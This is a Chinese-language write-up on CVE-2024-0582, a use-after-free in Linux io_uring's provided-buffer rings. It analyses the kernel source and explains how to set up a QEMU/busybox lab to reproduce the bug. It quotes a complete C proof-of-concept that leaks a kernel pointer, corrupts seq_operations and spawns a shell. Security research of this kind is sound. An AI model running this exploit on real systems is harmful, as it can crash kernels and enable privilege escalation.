CVE-2024-0582 是 Linux Kernel 的高性能异步 IO API io_uring 中的一个漏洞:使用 IORING_REGISTER_PBUF_RING 注册的 ring buffer 在被 mmap() 映射到用户态之后,仍然可以被注销并释放,而用户态的映射依旧有效,从而形成页级 UAF,攻击者可以通过该漏洞攻击内核并完成内核提权;该漏洞的 CVSS 分数为 7.8,影响版本包括但不限于 6.4~6.6.5,本文我们选用 6.4 的版本内核源码进行分析。

漏洞分析

PBUF_RING Internal

我们这里主要关注 io_uring_register 函数中 switch 中与 PBUF_RING 相关的部分

注册:IORING_REGISTER_PBUF_RING

对于这个漏洞我们主要关注当 opcode == IORING_REGISTER_PBUF_RING 的情况,该 opcode 意味着注册一个环形缓冲区,其最终会调用到 io_register_pbuf_ring() 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
/*
 * Handler for IORING_REGISTER_PBUF_RING: validates the user-supplied
 * io_uring_buf_reg, finds or allocates the io_buffer_list for reg.bgid and
 * then either pins a user-provided ring (io_pin_pbuf_ring) or has the kernel
 * allocate one (io_alloc_pbuf_ring) when IOU_PBUF_RING_MMAP is set.
 *
 * Returns 0 on success or a negative errno value.
 */
int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
struct io_buffer_list *bl, *free_bl = NULL;
int ret;

/* copy the registration request in from userspace */
if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;

/* reserved fields must be zero; IOU_PBUF_RING_MMAP is the only flag accepted */
if (reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (reg.flags & ~IOU_PBUF_RING_MMAP)
return -EINVAL;
/*
 * Without IOU_PBUF_RING_MMAP the caller supplies the ring memory, so
 * ring_addr must be non-zero and page aligned. With it, ring_addr must
 * be zero because the kernel allocates the ring.
 */
if (!(reg.flags & IOU_PBUF_RING_MMAP)) {
if (!reg.ring_addr)
return -EFAULT;
if (reg.ring_addr & ~PAGE_MASK)
return -EINVAL;
} else {
if (reg.ring_addr)
return -EINVAL;
}

if (!is_power_of_2(reg.ring_entries))
return -EINVAL;

/* cannot disambiguate full vs empty due to head/tail size */
if (reg.ring_entries >= 65536)
return -EINVAL;

/* lazily set up ctx->io_bl for low group ids; note this 'ret' shadows the outer one */
if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) {
int ret = io_init_bl_list(ctx);
if (ret)
return ret;
}

bl = io_buffer_get_list(ctx, reg.bgid);
if (bl) {
/* if mapped buffer ring OR classic exists, don't allow */
if (bl->is_mapped || !list_empty(&bl->buf_list))
return -EEXIST;
} else {
/* no list for this bgid yet: allocate one and remember it for the error path */
free_bl = bl = kzalloc(sizeof(*bl), GFP_KERNEL);
if (!bl)
return -ENOMEM;
}

if (!(reg.flags & IOU_PBUF_RING_MMAP))
ret = io_pin_pbuf_ring(&reg, bl);
else
ret = io_alloc_pbuf_ring(&reg, bl);

/* success: record the ring geometry and publish the list under reg.bgid */
if (!ret) {
bl->nr_entries = reg.ring_entries;
bl->mask = reg.ring_entries - 1;

io_buffer_add_list(ctx, bl, reg.bgid);
return 0;
}

/* failure: free_bl is NULL when an existing list was reused, so only a fresh list is freed */
kfree(free_bl);
return ret;
}

可以看到,存在 IOU_PBUF_RING_MMAP 标志时会调用 io_alloc_pbuf_ring 函数,由内核分配连续页面,否则调用 io_pin_pbuf_ring 函数将用户态页面 pin 到 ring 上(在此之前,若 io_buffer_get_list 没有获取到对应 bgid 的 bl,则会先通过 kzalloc 分配一个新的 io_buffer_list)。
IOU_PBUF_RING_MMAP 标志表示由内核分配环形缓冲区的内存,之后用户态应用使用 mmap() 映射来访问:
继续查看 io_alloc_pbuf_ring() 函数,可以看到调用 __get_free_pages 来分配页面,flag 为 GFP_KERNEL_ACCOUNT :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
/*
 * Allocate pages via alloc_pages() with the given order and return the
 * kernel virtual address of the result, or 0 when the allocation fails.
 * __GFP_HIGHMEM is cleared from the mask before allocating (presumably
 * because the result must be addressable through page_address()).
 */
unsigned long __get_free_pages(gfp_t gfp_mask, unsigned int order)
{
struct page *page;

page = alloc_pages(gfp_mask & ~__GFP_HIGHMEM, order);
if (!page)
return 0;
return (unsigned long) page_address(page);
}
EXPORT_SYMBOL(__get_free_pages);
/*
 * Kernel-side allocation of a provided-buffer ring (the IOU_PBUF_RING_MMAP
 * path). The ring is obtained straight from the page allocator as a zeroed,
 * memcg-accounted compound allocation and attached to @bl.
 *
 * Returns 0 on success or -ENOMEM if the pages cannot be allocated.
 */
static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
size_t ring_size;
void *ptr;

/* size in bytes is rounded up to a page order by get_order() */
ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
if (!ptr)
return -ENOMEM;

/* is_mmap marks the ring as kernel-allocated; the remove and mmap paths key off it */
bl->buf_ring = ptr;
bl->is_mapped = 1;
bl->is_mmap = 1;
return 0;
}

分配的结构体为 io_uring_buf_ring ,其定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
 * Layout of a provided-buffer ring: a flexible array of struct io_uring_buf
 * entries, with an anonymous struct overlaid on the start of the array so
 * that 'tail' occupies bytes that are otherwise reserved.
 */
struct io_uring_buf_ring {
union {
/*
* To avoid spilling into more pages than we need to, the
* ring tail is overlaid with the io_uring_buf->resv field.
*/
struct {
__u64 resv1;
__u32 resv2;
__u16 resv3;
__u16 tail;
};
__DECLARE_FLEX_ARRAY(struct io_uring_buf, bufs);
};
};

图示:

注销:IORING_UNREGISTER_PBUF_RING

注销 PBUF_RING 对应的操作为 IORING_UNREGISTER_PBUF_RING ,内核会调用到 io_unregister_pbuf_ring 进行处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/*
 * Handler for IORING_UNREGISTER_PBUF_RING: looks up the buffer list for
 * reg.bgid, releases its ring via __io_remove_buffers() and, for group ids
 * at or above BGID_ARRAY, erases the list from ctx->io_bl_xa and frees it.
 *
 * Returns 0 on success, -EFAULT/-EINVAL on a bad request, -ENOENT when no
 * list exists for the group id.
 *
 * Note: nothing in this function checks whether the ring is still mapped
 * into userspace through mmap() before it is released.
 */
int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
struct io_buffer_list *bl;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;
/* reserved fields and flags must all be zero for unregistration */
if (reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (reg.flags)
return -EINVAL;

bl = io_buffer_get_list(ctx, reg.bgid);
if (!bl)
return -ENOENT;
/* only ring-mapped lists can be unregistered through this opcode */
if (!bl->is_mapped)
return -EINVAL;

/* -1U: remove everything the list holds */
__io_remove_buffers(ctx, bl, -1U);
if (bl->bgid >= BGID_ARRAY) {
xa_erase(&ctx->io_bl_xa, bl->bgid);
kfree(bl);
}
return 0;
}

io_unregister_pbuf_ring 先通过 __io_remove_buffers 函数释放 bl->buf_ring 对应的页面,然后(当 bgid >= BGID_ARRAY 时)使用 xa_erase 函数移除该 io_buffer_list 并用 kfree 将其释放。
__io_remove_buffers 函数定义如下,由于在 alloc 时指定了 is_mapped = 1; is_mmap = 1,因此会走以下路径:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/*
 * Release up to @nbufs buffers held by @bl. Only the ring-mapped path is
 * shown here; the article elides the remaining code with "...".
 *
 * For a kernel-allocated ring (is_mmap set) the backing compound page has
 * its reference dropped and is freed when the count reaches zero. No check
 * for existing userspace mappings of that page appears in this path.
 *
 * Returns the number of entries that were outstanding (tail - head) for a
 * ring-mapped list.
 */
static int __io_remove_buffers(struct io_ring_ctx *ctx,
struct io_buffer_list *bl, unsigned nbufs)
{
unsigned i = 0;

/* shouldn't happen */
if (!nbufs)
return 0;

if (bl->is_mapped) {
/* entries between the consumer head and the ring tail */
i = bl->buf_ring->tail - bl->head;
if (bl->is_mmap) {
struct page *page;

/* drop our reference on the ring's head page; free it if that was the last one */
page = virt_to_head_page(bl->buf_ring);
if (put_page_testzero(page))
free_compound_page(page);
bl->buf_ring = NULL;
bl->is_mmap = 0;
/* NOTE(review): condition and body of this branch are elided in the article; presumably the pinned-user-pages case */
} else if {
...
}
/* make sure it's seen as empty */
INIT_LIST_HEAD(&bl->buf_list);
bl->is_mapped = 0;
return i;
}

...
}

使用:io_uring_mmap

可以通过 mmap() 对 io_uring 的 fd 进行映射,内核最终会调用到 io_uring_mmap() 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/*
 * mmap handler for the io_uring file: resolves the requested offset to a
 * kernel pointer through io_uring_validate_mmap_request() and maps the
 * corresponding physical page frames into the caller's VMA.
 *
 * Returns 0 on success or a negative errno.
 */
static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
{
size_t sz = vma->vm_end - vma->vm_start;
unsigned long pfn;
void *ptr;

ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
if (IS_ERR(ptr))
return PTR_ERR(ptr);

/* translate the kernel virtual address into a page frame number and map it by pfn */
pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
}

//...

static const struct file_operations io_uring_fops = {
.release = io_uring_release,
.mmap = io_uring_mmap,

继续查看 io_uring_validate_mmap_request 函数的内容,可以发现对于 pbuf,返回的指针来自 ctx 中对应 bgid 的 bl,即 bl->buf_ring:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
/*
 * Return the kernel address of the provided-buffer ring registered for
 * @bgid, or NULL when no list exists for that group or the ring was not
 * kernel-allocated (is_mmap clear).
 */
void *io_pbuf_get_address(struct io_ring_ctx *ctx, unsigned long bgid)
{
struct io_buffer_list *bl;

bl = io_buffer_get_list(ctx, bgid);
if (!bl || !bl->is_mmap)
return NULL;

return bl->buf_ring;
}
/*
 * Resolve an mmap offset on an io_uring file to the kernel memory backing
 * it: the SQ/CQ rings, the SQE array, or a provided-buffer ring selected by
 * the buffer group id encoded in the offset.
 *
 * Returns the kernel pointer on success, or ERR_PTR(-EINVAL) for an unknown
 * offset, a missing buffer ring, or a size larger than the backing page.
 */
static void *io_uring_validate_mmap_request(struct file *file,
loff_t pgoff, size_t sz)
{
struct io_ring_ctx *ctx = file->private_data;
loff_t offset = pgoff << PAGE_SHIFT;
struct page *page;
void *ptr;

switch (offset & IORING_OFF_MMAP_MASK) {
case IORING_OFF_SQ_RING:
case IORING_OFF_CQ_RING:
ptr = ctx->rings;
break;
case IORING_OFF_SQES:
ptr = ctx->sq_sqes;
break;
case IORING_OFF_PBUF_RING: {
unsigned int bgid;

/* the bits above the mmap mask carry the buffer group id */
bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT;
/* uring_lock covers only the lookup; ptr is used after the lock is dropped */
mutex_lock(&ctx->uring_lock);
ptr = io_pbuf_get_address(ctx, bgid);
mutex_unlock(&ctx->uring_lock);
if (!ptr)
return ERR_PTR(-EINVAL);
break;
}
default:
return ERR_PTR(-EINVAL);
}

/* refuse mappings larger than the (possibly compound) page behind ptr */
page = virt_to_head_page(ptr);
if (sz > page_size(page))
return ERR_PTR(-EINVAL);

return ptr;
}

漏洞成因

当我们将 bl->buf_ring 的内存通过 mmap() 映射出去后,仍然可以通过 io_unregister_pbuf_ring 函数将这块内存释放掉,因此可以先进行内存分配,再 mmap,最后再释放这块内存就直接有一个 UAF:可以通过 mmap 的内存区域直接读写释放掉的内存页。

POC

这里直接 copy 了 a3 的 poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
/**
* Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/user.h>
#include <liburing.h>

/*
 * Kernel-style error-pointer helpers: a pointer whose value lies in the top
 * 4095 addresses encodes a negative errno. The argument is parenthesized so
 * that compound expressions (ternaries, arithmetic) expand correctly.
 */
#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) (ptr) >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) (ptr))
#endif

/*
 * ANSI-colored message wrappers; msg must be a string literal because it is
 * concatenated at compile time. Green = success, blue = info, red = error.
 * (The SUCCESSS_MSG spelling is kept because the rest of the file uses it.)
 */
#define SUCCESSS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

/**
 * bind_core - restrict the calling process to a single CPU
 * @core: index of the CPU to run on
 *
 * Binding is best effort: if sched_setaffinity() fails, the error is
 * reported and the function returns without claiming success, leaving the
 * process on its previous affinity mask.
 */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);

    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        perror(ERR_MSG("[x] Unable to bind process to core"));
        return;
    }

    printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

/**
 * setup_pbuf_ring_mmap - register a kernel-allocated pbuf ring and mmap() it
 * @ring:         initialized io_uring instance
 * @ring_entries: number of io_uring_buf entries in the ring
 * @bgid:         buffer group id to register the ring under
 * @flags:        flags forwarded to io_uring_register_buf_ring()
 * @retp:         out: 0 on success, negative error code on failure
 *
 * Returns the user-space mapping of the ring, or NULL on failure (with the
 * reason stored in *retp). If the mmap() step fails, the ring that was just
 * registered is unregistered again so the group id is not leaked.
 */
struct io_uring_buf_ring*
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
                     int bgid, unsigned int flags, int *retp)
{
    struct io_uring_buf_ring *buf_ring;
    struct io_uring_buf_reg buf_reg;
    size_t ring_size;
    off_t offset;
    int ret;

    memset(&buf_reg, 0, sizeof(buf_reg));

    /* ring_addr stays zero: with IOU_PBUF_RING_MMAP the kernel allocates */
    buf_reg.ring_entries = ring_entries;
    buf_reg.bgid = bgid;
    buf_reg.flags = IOU_PBUF_RING_MMAP;

    ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
    if (ret) {
        puts(ERR_MSG("[x] Error occur while doing io_uring_register_buf_ring"));
        *retp = ret;
        return NULL;
    }

    /**
    [chr(int(i,16))for i in['3361626e74747261'[i:i+2]for i in range(0,16,2)]][::-1]
    **/
    /* the mmap offset selects the pbuf region and encodes the group id */
    offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
    ring_size = (size_t) ring_entries * sizeof(struct io_uring_buf);
    buf_ring = mmap(
        NULL,
        ring_size,
        PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
        ring->ring_fd,
        offset
    );

    /* mmap() reports failure as MAP_FAILED plus errno, not as an error pointer */
    if (buf_ring == MAP_FAILED) {
        ret = -errno; /* capture before any call below can clobber errno */
        puts(ERR_MSG("[x] Error occur while doing mmap() for io_uring"));
        io_uring_unregister_buf_ring(ring, bgid);
        *retp = ret;
        return NULL;
    }

    *retp = 0;
    return buf_ring;
}

#define NR_PAGES 1
#define NR_BUFFERS 0x100
#define SEQ_FILE_NR 0x200

/**
 * proof_of_concept - demonstrate the CVE-2024-0582 page-level use-after-free
 *
 * Steps:
 *  1. register NR_BUFFERS kernel-allocated pbuf rings and mmap() each one;
 *  2. unregister them all while the mappings are still in place;
 *  3. open SEQ_FILE_NR seq files so new kernel objects may reuse the pages;
 *  4. scan the stale mappings for a value that looks like a kernel pointer,
 *     overwrite it with a marker, then read() the seq files to trigger a
 *     call through the corrupted data.
 *
 * Exits with EXIT_FAILURE if any setup step fails or no kernel pointer is
 * found in the stale mappings.
 */
void proof_of_concept(void)
{
    struct io_uring ring;
    void **buffers;
    int seq_fd[SEQ_FILE_NR], found = 0;
    uint64_t marker;
    int ret;

    puts(SUCCESSS_MSG("-------- CVE-2024-0582 Proof-of-concet --------"));
    puts(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------"));
    puts(SUCCESSS_MSG("-----------------------------------------------\n"));

    puts("[*] Preparing...");

    bind_core(0);

    /* liburing returns -errno and does not set errno, so perror() is wrong here */
    ret = io_uring_queue_init(4, &ring, 0);
    if (ret < 0) {
        fprintf(
            stderr,
            ERR_MSG("[x] Unable to init for io_uring queue") ": %s\n",
            strerror(-ret)
        );
        exit(EXIT_FAILURE);
    }

    puts("[*] Allocating pbuf ring and doing mmap()...");

    buffers = calloc(NR_BUFFERS, sizeof(void*));
    if (!buffers) {
        perror(ERR_MSG("[x] Unable to allocate buffer pointer array"));
        exit(EXIT_FAILURE);
    }

    for (int i = 0; i < NR_BUFFERS; i++) {
        buffers[i] = setup_pbuf_ring_mmap(
            &ring,
            NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
            i,
            0,
            &ret
        );
        if (ret) {
            printf(
                ERR_MSG("[x] Unable to set up") " No.%d "
                ERR_MSG("pbuf ring, error code: ") "%d\n",
                i,
                ret
            );
            exit(EXIT_FAILURE);
        }

        io_uring_buf_ring_init(buffers[i]);
    }

    puts("[*] Triggering page-level UAF vulnerabilities...");

    /* the user-space mappings in buffers[] survive this unregistration */
    for (int i = 0; i < NR_BUFFERS; i++) {
        ret = io_uring_unregister_buf_ring(&ring, i);
        if (ret) {
            printf(
                ERR_MSG("[x] Unable to unregister") " No.%d "
                ERR_MSG("pbuf ring, error code: ") "%d\n",
                i,
                ret
            );
            exit(EXIT_FAILURE);
        }
    }

    puts("[*] Reallocating page into seq_file::seq_operations...");

    for (int i = 0; i < SEQ_FILE_NR; i++) {
        if ((seq_fd[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
            int err = errno; /* report the real cause, not the -1 from open() */

            printf(
                ERR_MSG("[x] Unable to open") " No.%d "
                ERR_MSG("seq file, error code: ") "%d\n",
                i,
                err
            );
            exit(EXIT_FAILURE);
        }
    }

    puts("[*] Checking data leak and overwriting...");

    /* build the 8-byte marker with memcpy to avoid a type-punned, unaligned load */
    memcpy(&marker, "arttnba3", sizeof(marker));

    for (int i = 0; i < NR_BUFFERS && !found; i++) {
        uint64_t *buffer = buffers[i];

        for (size_t j = 0; j < NR_PAGES * PAGE_SIZE / sizeof(uint64_t); j++) {
            /* value range treated as "looks like a kernel text/data pointer" */
            if (buffer[j] > 0xffffffff80000000ULL
                && buffer[j] < 0xfffffffff0000000ULL) {
                printf(
                    SUCCESSS_MSG("[+] Got kernel data leak:") " %" PRIx64 " "
                    SUCCESSS_MSG("at location ") "%d-%zu\n",
                    buffer[j],
                    i,
                    j
                );
                buffer[j] = marker;
                found = 1;
                break;
            }
        }
    }

    if (!found) {
        puts(ERR_MSG("[x] Failed to reallocate UAF page as seq_operations!"));
        exit(EXIT_FAILURE);
    }

    puts("[*] Triggering kernel panic...");

    sleep(1);

    for (int i = 0; i < SEQ_FILE_NR; i++) {
        char buf[0x1000];

        /* the result is irrelevant: only the kernel-side read path matters */
        if (read(seq_fd[i], buf, 1) < 0) {
            continue;
        }
    }

    puts("[?] So you're still alive here!?");
    system("/bin/sh");

    free(buffers);
}

/*
 * Program entry point: runs the proof of concept. Command-line arguments
 * and the environment are not used.
 */
int main(int argc, char **argv, char **envp)
{
    (void) argc;
    (void) argv;
    (void) envp;

    proof_of_concept();

    return EXIT_SUCCESS;
}

漏洞复现

这里我们选择 linux-6.4.16 内核源码进行编译

1
2
3
4
5
6
wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v6.x/linux-6.4.16.tar.xz
unxz linux-6.4.16.tar.xz
# unxz only decompresses; unpack the tarball and enter the source tree
tar -xf linux-6.4.16.tar
cd linux-6.4.16
# choose config, all default is good
make menuconfig
# build the compressed kernel image (arch/x86/boot/bzImage)
make -j$(nproc) bzImage


有一个证书功能的报错:https://blog.csdn.net/m0_47696151/article/details/121574718
另外 gcc 版本不要太新(arch 复现环境的痛 XD,在服务器上 gcc 11.1 可以成功编译)

使用 busybox 来搭建基本文件系统

1
2
3
4
5
6
7
8
wget https://busybox.net/downloads/busybox-1.36.0.tar.bz2
tar -jxvf busybox-1.36.0.tar.bz2
# the following make commands must run inside the extracted source tree
cd busybox-1.36.0
# `Settings` ---> `Build static binary file (no shared lib)` to compile static busybox
# Optional: in `Linux System Utilities` deselect `Support mounting NFS file systems on Linux <2.6.23 (NEW)`; in `Networking Utilities` deselect `inetd`.
make menuconfig
make -j$(nproc)
# installs into ./_install by default
make install

配置文件系统,在编译生成的 _install 目录下创建基本的文件系统结构

配置文件系统 

我们首先在 _install 目录下创建基本的文件系统结构:

1
2
3
4
5
6
# Lay out the skeleton of the root filesystem inside busybox's install dir
cd _install
mkdir -pv {bin,sbin,etc,proc,sys,dev,home/ctf,root,tmp,lib64,lib/x86_64-linux-gnu,usr/{bin,sbin}}
mkdir etc/init.d
# empty init table and init script, filled in by the following steps
touch etc/inittab etc/init.d/rcS
chmod +x etc/init.d/rcS

在我们创建的 ./etc/inittab 中写入如下内容:

1
2
3
4
5
6
# busybox init table; each entry is <id>:<runlevels>:<action>:<process>
# run the system initialization script at boot
::sysinit:/etc/init.d/rcS
# then offer a login prompt
::askfirst:/bin/login
# handle ctrl-alt-del by rebooting
::ctrlaltdel:/sbin/reboot
# on shutdown: disable swap and unmount everything
::shutdown:/sbin/swapoff -a
::shutdown:/bin/umount -a -r
# re-exec init on restart
::restart:/sbin/init

在上面的文件中指定了系统初始化脚本为 etc/init.d/rcS,因此接下来我们配置这个文件写入如下内容,主要是挂载各种文件系统,以及设置各目录的权限,并创建一个非特权用户:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/bin/sh
# System init script: fix ownership, mount pseudo filesystems, restrict
# kernel information leaks, then drop into an unprivileged shell.

# everything is owned by root except the ctf user's home directory
chown -R root:root /
chmod 700 /root
chown -R ctf:ctf /home/ctf
# mount proc, sysfs, a tmpfs on /tmp and devpts
mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
mkdir /dev/pts
mount -t devpts devpts /dev/pts
# enable the dmesg_restrict and kptr_restrict sysctls for the unprivileged user
echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
# run a shell as the ctf user; power the machine off once that shell exits
cd /home/ctf
su ctf -c sh
poweroff -d 0 -f

然后为这个脚本添加可执行权限,该脚本通常用作我们自定义的环境初始化脚本:
chmod +x ./etc/init.d/rcS

接下来我们配置用户组相关权限,在这里建立了两个用户组 root 和 ctf ,以及两个用户 root 和 ctf,并配置了一条文件系统挂载项:

1
2
3
4
5
# two users (root, ctf) and their groups; the first write of each file truncates it
echo "root:x:0:0:root:/root:/bin/sh" > etc/passwd
echo "ctf:x:1000:1000:ctf:/home/ctf:/bin/sh" >> etc/passwd
echo "root:x:0:" > etc/group
echo "ctf:x:1000:" >> etc/group
# single mount entry for devpts (stray trailing backtick removed: it opened an unterminated command substitution)
echo "none /dev/pts devpts gid=5,mode=620 0 0" > etc/fstab

打包文件系统
按 cpio 格式打包即可,最后设置启动脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh 
# Boot ./bzImage in QEMU with ./rootfs.cpio as the initrd.
# - 128M of RAM, a kvm64 CPU model with SMEP enabled, 2 cores
# - no graphical output (-nographic); the kernel console is ttyS0
# - kernel command line turns an oops into a panic and reboots 1s after a panic
# - -snapshot and -s are passed through to QEMU (-s is its gdb stub shorthand)
qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-initrd ./rootfs.cpio \
-monitor /dev/null \
-append "root=/dev/ram rdinit=/sbin/init console=ttyS0 oops=panic panic=1 loglevel=3 quiet kaslr" \
-cpu kvm64,+smep \
-smp cores=2,threads=1 \
-nographic \
-snapshot \
-s

参考链接